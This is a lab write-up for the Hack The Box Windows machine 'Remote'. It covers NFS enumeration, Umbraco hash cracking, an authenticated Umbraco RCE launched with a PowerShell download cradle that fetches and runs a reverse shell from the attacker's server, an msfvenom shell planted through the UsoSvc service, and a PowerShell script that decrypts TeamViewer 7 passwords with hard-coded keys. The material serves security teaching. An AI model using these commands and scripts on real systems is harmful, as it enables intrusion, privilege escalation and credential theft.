
Remote Writeup [HTB]

Remote is a Windows machine from Hack The Box rated as easy. It consists of finding credentials in an exposed NFS backup, using them with an authenticated Umbraco RCE exploit to obtain initial access, and then abusing the UsoSvc service to gain a SYSTEM shell. Alternatively, TeamViewer 7 can be exploited to recover the Administrator password.

Enumeration

Running nmap:

nmap -sC -sV 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-03 15:57 CEST                                                           
Nmap scan report for 10.10.10.180
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)

Browsing to port 80 we find the Acme Widgets corporate site.

Running gobuster we find an interesting directory:

gobuster dir -u 10.10.10.180 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/home (Status: 200)
/blog (Status: 200)
/people (Status: 200)
/products (Status: 200)
/contact (Status: 200)
/install (Status: 302)
/about-us (Status: 200)

Browsing to /install (the path that returned a 302 above) reveals that the site is running the Umbraco CMS and takes us to its login page.

As rpcbind (111) and NFS/mountd (2049) are exposed, we can list the NFS exports:

showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

The export is accessible to everyone, so we can mount it on our machine:

mount -t nfs 10.10.10.180:/site_backups /mnt

Inside App_Data we find an interesting file, Umbraco.sdf, the SQL Server Compact database that stores Umbraco's users and settings. Searching the output of strings on it for the admin account finds the user record:

strings Umbraco.sdf | head
admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}

The record contains the user admin@htb.local immediately followed by a 40-hex-character digest, and the adjacent {"hashAlgorithm":"SHA1"} marker confirms it is an unsalted SHA-1 hash. Saving it to hash.txt as admin@htb.local:<hash>, we can crack it with john (Raw-SHA1 format):

john --format=Raw-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt
admin@htb.local:baconandcheese
1 password hash cracked, 0 left

Exploitation

With these credentials we can log in to the Umbraco back office via /install, where we discover the site is running Umbraco version 7.12.4.

This version is affected by an authenticated remote code execution vulnerability, for which a public exploit exists: https://www.exploit-db.com/exploits/46153. It needs valid back-office credentials, which is why the hash we recovered matters.

We will use Nishang's Invoke-PowerShellTcp.ps1 to obtain a PowerShell reverse shell.

First we set up a Python web server on our machine to host the script (on port 800, the port the download cradles below request):

python -m SimpleHTTPServer 800

Then the following line is appended to the end of the script so that the reverse shell is launched as soon as the script is loaded in memory on the target:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.26 -Port 443

Now we run the exploit. The script authenticates with the recovered credentials, then uses the vulnerability to execute the program given with -c with the arguments given with -a; here that is powershell.exe with a download cradle that fetches Invoke-PowerShellTcp.ps1 from our web server and executes it in memory:

python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX(New-Object Net.WebClient).downloadString('http://10.10.15.26:800/Invoke-PowerShellTcp.ps1')"

And we obtain a reverse shell in netcat :

nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.15.26] from (UNKNOWN) [10.10.10.180] 49759
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv> $env:UserName
REMOTE$

The working directory (inetsrv) and the user name show that we are running inside the IIS worker process under a low-privileged service identity (reported through the machine account name REMOTE$), so we need to escalate privileges.

Privilege Escalation Method #1

To enumerate the system we use the PowerUp PowerShell script: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp

We download it to the machine from our web server and dot-source it so its functions are loaded into the current session:

PS C:\windows\temp> invoke-webrequest -Uri http://10.10.15.26:800/PowerUp.ps1 -OutFile PowerUp.ps1
PS C:\windows\temp> . .\PowerUp.ps1

Running all checks, the service-permission check produces an interesting result:

PS C:\windows\temp> Invoke-AllChecks
[*] Running Invoke-AllChecks
[*] Checking service permissions...
ServiceName   : UsoSvc
Path          : C:\Users\Public\fremote.exe
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -ServiceName 'UsoSvc'

PowerUp's service-permission check lists services whose configuration the current user is allowed to modify. UsoSvc (the Update Orchestrator Service) runs as LocalSystem, so pointing its binary path at an executable of our own and starting the service gets that executable run as SYSTEM. The steps that PowerUp's Invoke-ServiceAbuse automates can be done by hand with sc.exe.

First, we create a shell with msfvenom :

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.26 LPORT=4444 -f exe >shell.exe

After uploading shell.exe to C:\windows\temp with Invoke-WebRequest as before, we stop the service, point its binary path at our executable and start it again (sc.exe requires the space after binPath=):

PS C:\windows\temp> sc.exe stop UsoSvc
PS C:\windows\temp> sc.exe config UsoSvc binPath= "C:\windows\temp\shell.exe"
PS C:\windows\temp> sc.exe start UsoSvc

Because shell.exe never registers with the Service Control Manager, sc.exe start eventually reports a timeout error (1053), but the reverse shell has connected by then.

And we obtain a shell as nt authority\system :

nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.15.26] from (UNKNOWN) [10.10.10.180] 49691
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
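The same service abuse, written as a small PowerShell script that first shows the service DACL (the condition PowerUp checks for us), then repoints the binary, and finally restores the original path so Windows Update keeps working and the box is left as we found it. This is an added example, not code from the original writeup or from PowerUp; it assumes the same payload path as above, and the parameter names are our own.

```powershell
# Added example (not from the original writeup): manual UsoSvc binPath abuse
# with save/restore of the original service configuration.
param(
    [string]$ServiceName = 'UsoSvc',                   # service found by PowerUp
    [string]$Payload     = 'C:\windows\temp\shell.exe' # msfvenom reverse shell uploaded earlier
)

# 1. Save the current binary path from the service's registry key so it can be restored.
$svcKey   = "HKLM:\SYSTEM\CurrentControlSet\Services\$ServiceName"
$original = (Get-ItemProperty -Path $svcKey -Name ImagePath).ImagePath
Write-Host "[*] $ServiceName currently runs: $original"

# 2. Show the service DACL in SDDL form. The abuse only works if an ACE matching
#    our SID or one of our groups grants DC (SERVICE_CHANGE_CONFIG), RP (SERVICE_START)
#    and WP (SERVICE_STOP); this is what PowerUp's service-permission check looks for.
Write-Host "[*] Service security descriptor:"
sc.exe sdshow $ServiceName

# 3. Repoint the service at the payload and start it. sc.exe needs the space after
#    'binPath='. shell.exe never calls StartServiceCtrlDispatcher, so 'sc start'
#    returns error 1053 after the SCM timeout, but the reverse shell connects first.
sc.exe stop   $ServiceName | Out-Null
sc.exe config $ServiceName binPath= "$Payload"
sc.exe start  $ServiceName

# 4. Put the real binary path back so the Update Orchestrator service works again
#    and the modification is not left behind.
sc.exe config $ServiceName binPath= "$original"
Write-Host "[*] binPath restored to: $original"
```

Run it from the low-privileged PowerShell shell with the netcat listener already waiting on port 4444; if sdshow shows no ACE granting DC/RP/WP to one of our groups, the config change will simply be denied and nothing else happens.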

Privilege Escalation Method #2

Enumerating the file system, we find TeamViewer version 7 installed:

C:\Program Files (x86)>cd TeamViewer
C:\Program Files (x86)\TeamViewer>dir
Directory of C:\Program Files (x86)\TeamViewer
02/20/2020  03:14 AM    <DIR>          .
02/20/2020  03:14 AM    <DIR>          ..
02/27/2020  11:35 AM    <DIR>          Version7

TeamViewer 7 stores its passwords (including the unattended-access password) in the registry, encrypted with AES-128-CBC under a key and IV hard-coded in the client (CVE-2019-18988). Any local user who can read the registry can therefore recover them; the Metasploit post module https://www.rapid7.com/db/modules/post/windows/gather/credentials/teamviewer_passwords automates this.

Running the Metasploit post module (it needs a session on the target), we recover the unattended-access password:

msf5 post(windows/gather/credentials/teamviewer_passwords) > exploit
[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
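The same recovery can be done without Metasploit from the PowerShell shell we already have. The following is an added example, not code from the original writeup or from the Metasploit module; it uses the static key/IV published with CVE-2019-18988 and the registry locations and value names that the module reads, and treats the plaintext as null-padded UTF-16LE, as the module does.

```powershell
# Added example (not from the original writeup): decrypt TeamViewer 7 passwords
# stored in the registry with the client's hard-coded AES-128-CBC key and IV.
function Get-TeamViewer7Password {
    [CmdletBinding()]
    param(
        # Registry keys (64-bit and 32-bit views) and value names read by the
        # Metasploit teamviewer_passwords module.
        [string[]]$Paths = @(
            'HKLM:\SOFTWARE\WOW6432Node\TeamViewer\Version7',
            'HKLM:\SOFTWARE\TeamViewer\Version7'
        ),
        [string[]]$Values = @(
            'OptionsPasswordAES', 'SecurityPasswordAES', 'SecurityPasswordExported',
            'ServerPasswordAES', 'ProxyPasswordAES', 'LicenseKeyAES'
        )
    )

    # Static key and IV shared by every TeamViewer installation (CVE-2019-18988).
    $key = [byte[]](0x06,0x02,0x00,0x00,0x00,0xA4,0x00,0x00,0x52,0x53,0x41,0x31,0x00,0x04,0x00,0x00)
    $iv  = [byte[]](0x01,0x00,0x01,0x00,0x67,0x24,0x4F,0x43,0x6E,0x67,0x62,0xF2,0x5E,0xA8,0xD7,0x04)

    foreach ($path in $Paths) {
        if (-not (Test-Path $path)) { continue }
        $item = Get-ItemProperty -Path $path
        foreach ($name in $Values) {
            $blob = $item.$name
            if (-not $blob) { continue }                  # value absent or empty
            $blob = [byte[]]$blob                         # REG_BINARY comes back as byte[]
            if ($blob.Length % 16 -ne 0) { continue }     # not whole AES blocks: skip

            $aes = [System.Security.Cryptography.Aes]::Create()
            $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
            $aes.Padding = [System.Security.Cryptography.PaddingMode]::None  # blobs are null-padded, not PKCS#7
            $aes.Key = $key
            $aes.IV  = $iv
            $dec = $aes.CreateDecryptor()
            try {
                $plain = $dec.TransformFinalBlock($blob, 0, $blob.Length)
            } finally {
                $dec.Dispose()
                $aes.Dispose()
            }

            # Plaintext is UTF-16LE; everything from the first null character on is padding.
            $text = [System.Text.Encoding]::Unicode.GetString($plain).Split([char]0)[0]
            [pscustomobject]@{ Key = $path; Value = $name; Password = $text }
        }
    }
}

Get-TeamViewer7Password | Format-Table -AutoSize
```

Only read access to HKLM is needed, so this runs from the IIS shell obtained earlier; a value whose decryption yields unprintable garbage indicates a blob written by a TeamViewer version that does not use this scheme, not a wrong key.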

That password is reused for the local Administrator account, so we can log in with evil-winrm:

evil-winrm -u Administrator -p '!R3m0te!' -i 10.10.10.180
Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator
This post is licensed under CC BY 4.0 by the author.